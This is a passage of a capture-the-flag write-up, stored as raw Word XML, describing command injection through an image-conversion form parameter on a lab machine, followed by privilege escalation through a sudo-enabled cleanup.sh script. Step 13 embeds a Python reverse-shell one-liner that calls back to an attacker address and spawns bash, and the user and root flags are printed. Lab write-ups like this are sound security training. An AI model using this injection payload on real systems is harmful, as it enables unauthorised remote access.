    <w:p w14:paraId="526EB214" w14:textId="650B29E7" w:rsidR="00B71F29" w:rsidRDefault="00B71F29" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7853763B" w14:textId="34EBA42E" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F063E2B" w14:textId="3D8BE012" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1FF452" w14:textId="76ECC933" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB299E6" w14:textId="77777777" w:rsidR="00ED50F0" w:rsidRDefault="00ED50F0" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC0B993" w14:textId="022415E1" w:rsidR="00B71F29" w:rsidRDefault="00C15F27" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>12) I d</w:t>
      </w:r>
      <w:r w:rsidR="00D8686C">
        <w:t xml:space="preserve">ecided to check for command injection. This can be done by </w:t>
      </w:r>
      <w:r w:rsidR="00F64EA8">
        <w:t>adjusting the parameter.</w:t>
      </w:r>
      <w:r w:rsidR="00DE04FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64EA8">
        <w:t xml:space="preserve">Check the http server if it pick up any new </w:t>
      </w:r>
      <w:r w:rsidR="00FE63CA">
        <w:t>request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245458CE" w14:textId="3E6CF1D2" w:rsidR="0018576E" w:rsidRDefault="0018576E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7485DEC0" wp14:editId="2C4886D9">
            <wp:extent cx="5731510" cy="3295650"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="190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F92D3" w14:textId="77777777" w:rsidR="00F14115" w:rsidRDefault="00F14115" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560707CA" w14:textId="55149DDC" w:rsidR="00A74469" w:rsidRDefault="00A74469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2F8F032" wp14:editId="2716D84D">
            <wp:extent cx="5420481" cy="1733792"/>
            <wp:effectExtent l="0" t="0" r="0" b="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D992" w14:textId="77777777" w:rsidR="00BF7A5A" w:rsidRDefault="00BF7A5A" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E3267B" w14:textId="7D7576AF" w:rsidR="00BF7A5A" w:rsidRDefault="00BF7A5A" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Http server pick up a new get </w:t>
      </w:r>
      <w:r w:rsidR="00F90DFE">
        <w:t>Request.</w:t>
      </w:r>
      <w:r w:rsidR="000C5C93">
        <w:t xml:space="preserve"> This evidently show that its is </w:t>
      </w:r>
      <w:r w:rsidR="00920709">
        <w:t>prone to command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568D337" w14:textId="77777777" w:rsidR="000F064B" w:rsidRDefault="000F064B" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F687AE" w14:textId="11087B7D" w:rsidR="00EE2E15" w:rsidRDefault="00EE2E15" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D76223C" w14:textId="080C17A4" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F398C3" w14:textId="663854CB" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A19D56D" w14:textId="6C1D7CBA" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4246EC5F" w14:textId="3D680FBC" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C308593" w14:textId="77777777" w:rsidR="00ED50F0" w:rsidRDefault="00ED50F0" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74850854" w14:textId="77777777" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CED8957" w14:textId="370A855C" w:rsidR="00EE2E15" w:rsidRDefault="00F90DFE" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>13)</w:t>
      </w:r>
      <w:r w:rsidR="00EE2E15">
        <w:t>Create a reverse shell using a</w:t>
      </w:r>
      <w:r w:rsidR="00F859B4">
        <w:t xml:space="preserve"> python script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6129D" w14:textId="77777777" w:rsidR="00633D09" w:rsidRDefault="00633D09" w:rsidP="00633D09">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;filetype=png;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7AB66" w14:textId="77777777" w:rsidR="00633D09" w:rsidRDefault="00633D09" w:rsidP="00633D09">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627EA669" w14:textId="1E0A63BF" w:rsidR="00F859B4" w:rsidRDefault="00633D09" w:rsidP="00633D09">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>&amp;dimensions=3000x2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB43625" w14:textId="74BFCB77" w:rsidR="000F064B" w:rsidRDefault="000F064B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763D3A30" wp14:editId="25E20D8C">
            <wp:extent cx="5731510" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="254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C2FC" w14:textId="77777777" w:rsidR="00114D64" w:rsidRDefault="00114D64" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C1F954" w14:textId="75FFF61D" w:rsidR="00114D64" w:rsidRDefault="003D2040" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>14)</w:t>
      </w:r>
      <w:r w:rsidR="00114D64">
        <w:t>I manage to penet</w:t>
      </w:r>
      <w:r w:rsidR="00132174">
        <w:t>rate successfully using the reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="0098640A">
        <w:t xml:space="preserve"> Prior to that I have started my </w:t>
      </w:r>
      <w:r w:rsidR="00173621">
        <w:t>net cat listener on port 9001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB201B" w14:textId="607C2672" w:rsidR="00C8070C" w:rsidRDefault="00AA4403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5DBD72E" wp14:editId="2DDACB8A">
            <wp:extent cx="4657725" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="9525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453" w14:textId="72EE118A" w:rsidR="00FC16BF" w:rsidRDefault="003D2040" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>15)</w:t>
      </w:r>
      <w:r w:rsidR="00FC16BF">
        <w:t xml:space="preserve">There is a user </w:t>
      </w:r>
      <w:r w:rsidR="00C72650">
        <w:t>called wizard.</w:t>
      </w:r>
      <w:r w:rsidR="008D290A">
        <w:t xml:space="preserve"> Currently, Im in the role of the wizard</w:t>
      </w:r>
      <w:r w:rsidR="00D75B10">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2E619" w14:textId="0F96534A" w:rsidR="00740B7A" w:rsidRDefault="00E1318C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505F7CE" wp14:editId="21005CF9">
            <wp:extent cx="5381625" cy="3562350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="200" name="Picture 2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D81A" w14:textId="74E889EB" w:rsidR="00740B7A" w:rsidRDefault="00740B7A" w:rsidP="00740B7A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1426"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Cat user.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1949E5" w14:textId="07886E12" w:rsidR="00464B5A" w:rsidRDefault="00EA3614" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00EA3614">
        <w:lastRenderedPageBreak/>
        <w:t>99842366d01a9a1a5503bc11f1658d09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DFCECA" w14:textId="77777777" w:rsidR="0091353C" w:rsidRDefault="0091353C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055A14BC" w14:textId="77777777" w:rsidR="0091353C" w:rsidRDefault="0091353C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48827B82" w14:textId="3E0AD864" w:rsidR="00464B5A" w:rsidRDefault="00EA6560" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>16)</w:t>
      </w:r>
      <w:r w:rsidR="00464B5A">
        <w:t>Using sudo -l</w:t>
      </w:r>
      <w:r w:rsidR="0037426E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE59BD">
        <w:t xml:space="preserve">to check on sudo </w:t>
      </w:r>
      <w:r w:rsidR="0003522A">
        <w:t>privileges.</w:t>
      </w:r>
      <w:r w:rsidR="00C14DCC" w:rsidRPr="00C14DCC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C14DCC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> As you can see </w:t>
      </w:r>
      <w:r w:rsidR="003160C8">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00C14DCC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">cleanup.sh script </w:t>
      </w:r>
      <w:r w:rsidR="003160C8">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">can be run </w:t>
      </w:r>
      <w:r w:rsidR="00C43C1F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00C14DCC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> root privileges.</w:t>
      </w:r>
      <w:r w:rsidR="00C43C1F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> It has no</w:t>
      </w:r>
      <w:r w:rsidR="00CA6028">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C43C1F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00CA6028">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C43C1F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE7CDF" w14:textId="7C597E91" w:rsidR="0091353C" w:rsidRDefault="0091353C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05968E7" wp14:editId="1AE8E997">
            <wp:extent cx="5731510" cy="1137285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715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DA0" w14:textId="3DF069C3" w:rsidR="00C72650" w:rsidRDefault="00D639FA" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checking </w:t>
      </w:r>
      <w:r w:rsidR="005F7EC6">
        <w:t>the content</w:t>
      </w:r>
      <w:r w:rsidR="000F5E83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in cleanup.sh</w:t>
      </w:r>
      <w:r w:rsidR="00AA1945">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB4797" w14:textId="1906B335" w:rsidR="00B406CA" w:rsidRDefault="000F5E83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115B911" wp14:editId="29699F96">
            <wp:extent cx="5619750" cy="2552700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574" w14:textId="45167CEE" w:rsidR="0071227F" w:rsidRDefault="00DD1B9F" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3C471" w14:textId="6066EEDB" w:rsidR="008A56EA" w:rsidRDefault="005F7EC6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7E630E8" wp14:editId="31F3E212">
            <wp:extent cx="5619048" cy="2552381"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="45" name="Picture 4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21B" w14:textId="77777777" w:rsidR="008A56EA" w:rsidRDefault="008A56EA" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DF955F" w14:textId="77777777" w:rsidR="006045C8" w:rsidRDefault="006045C8" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E516C61" w14:textId="77777777" w:rsidR="006045C8" w:rsidRDefault="006045C8" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7943FC" w14:textId="1530DB15" w:rsidR="008A56EA" w:rsidRDefault="008A56EA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5A3B11E9" wp14:editId="272B0BDC">
            <wp:extent cx="5505450" cy="45624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093" w14:textId="77777777" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19819C9E" w14:textId="4C8146EC" w:rsidR="003B1A5C" w:rsidRDefault="003B1A5C" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168AA281" w14:textId="77777777" w:rsidR="00ED50F0" w:rsidRDefault="00ED50F0" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6101B1" w14:textId="1E9371CE" w:rsidR="00DD1B9F" w:rsidRDefault="00DD1B9F" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73056037" w14:textId="08B8D5F8" w:rsidR="00A82C83" w:rsidRDefault="00D961FC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5F537E7" wp14:editId="590BB75D">
            <wp:extent cx="5504762" cy="4561905"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0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C84" w14:textId="77777777" w:rsidR="00A82C83" w:rsidRDefault="00A82C83" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4210DA48" w14:textId="2020C72C" w:rsidR="00E01FDA" w:rsidRDefault="00D765E5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C05BF59" w14:textId="75C444FE" w:rsidR="00E01FDA" w:rsidRDefault="00D765E5" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00D765E5">
        <w:t>f2034ccfa8be385f1cc86db9aa7f39c7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD1E08" w14:textId="77777777" w:rsidR="005D7F2E" w:rsidRDefault="005D7F2E" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5BC157" w14:textId="5AA09E16" w:rsidR="00E01FDA" w:rsidRDefault="00E01FDA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EDDA229" wp14:editId="35EEFD48">
            <wp:extent cx="4071668" cy="3630037"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8890"/>
            <wp:docPr id="202" name="Picture 2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36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B00" w14:textId="77777777" w:rsidR="005D7F2E" w:rsidRDefault="005D7F2E" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7B17B1" w14:textId="2348A078" w:rsidR="005D7F2E" w:rsidRDefault="005D7F2E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440D3CA" wp14:editId="24DB2ABC">
            <wp:extent cx="5731510" cy="2786380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="203" name="Picture 20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screenshot of a video gam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078" w14:textId="77777777" w:rsidR="00F20D74" w:rsidRDefault="00F20D74" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C101AF" w14:textId="06F98DF6" w:rsidR="00F20D74" w:rsidRDefault="00F20D7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EC7C5B9" wp14:editId="1D17F5D9">
            <wp:extent cx="5731510" cy="2480945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204" name="Picture 20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screenshot of a computer screen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B9A" w14:textId="77777777" w:rsidR="00D961FC" w:rsidRDefault="00D961FC" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5248AFBE" w14:textId="2E095F04" w:rsidR="00764E26" w:rsidRDefault="00AF593D" w:rsidP="00764E26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB3CF4">
        <w:t>References:</w:t>
      </w:r>
      <w:r w:rsidR="00BB3CF4" w:rsidRPr="00BB3CF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DABCCD9" w14:textId="4E09CC9F" w:rsidR="00BB3CF4" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00764E26" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/pentesting-web/nosql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F817759" w14:textId="51013504" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:anchor="shell" w:history="1">
        <w:r w:rsidR="0056561B" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/gtfobins/docker/#shell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="365BBF15" w14:textId="3EB0C7FA" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidR="0056561B" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="466EFEDB" w14:textId="599BA493" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:anchor=":~:text=To%20use%20this%20tool%2C%20you,%2Fsudoers%20file%20for%20editing).&amp;text=Save%20and%20close%20the%20file,full%20range%20of%20sudo%20privileges" w:history="1">
        <w:r w:rsidR="0056561B" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.techrepublic.com/article/how-to-quickly-give-users-sudo-privileges-in-linux/#:~:text=To%20use%20this%20tool%2C%20you,%2Fsudoers%20file%20for%20editing).&amp;text=Save%20and%20close%20the%20file,full%20range%20of%20sudo%20privileges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0056561B" w:rsidRPr="0056561B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43058B0C" w14:textId="7E241042" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="0056561B" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/pentesting-web/nosql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25E5152E" w14:textId="58975D1F" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId47" w:anchor=":~:text=The%20main%20differences%20between%20NoSQL,don't%20use%20standardized%20languages" w:history="1">
        <w:r w:rsidR="0056561B" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.imperva.com/learn/application-security/nosql-injection/#:~:text=The%20main%20differences%20between%20NoSQL,don't%20use%20standardized%20languages</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0056561B" w:rsidRPr="0056561B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF4A7F2" w14:textId="0F60C8A5" w:rsidR="0056561B" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00764E26" w:rsidRPr="0057527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/danielmiessler/SecLists</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="386533DA" w14:textId="77777777" w:rsidR="00D77414" w:rsidRPr="00D77414" w:rsidRDefault="00000000" w:rsidP="00A444F8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7513"/>
        </w:tabs>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="00AC64D2" w:rsidRPr="00514B6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/file-path-traversal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D77414">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D77414">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
    </w:p>
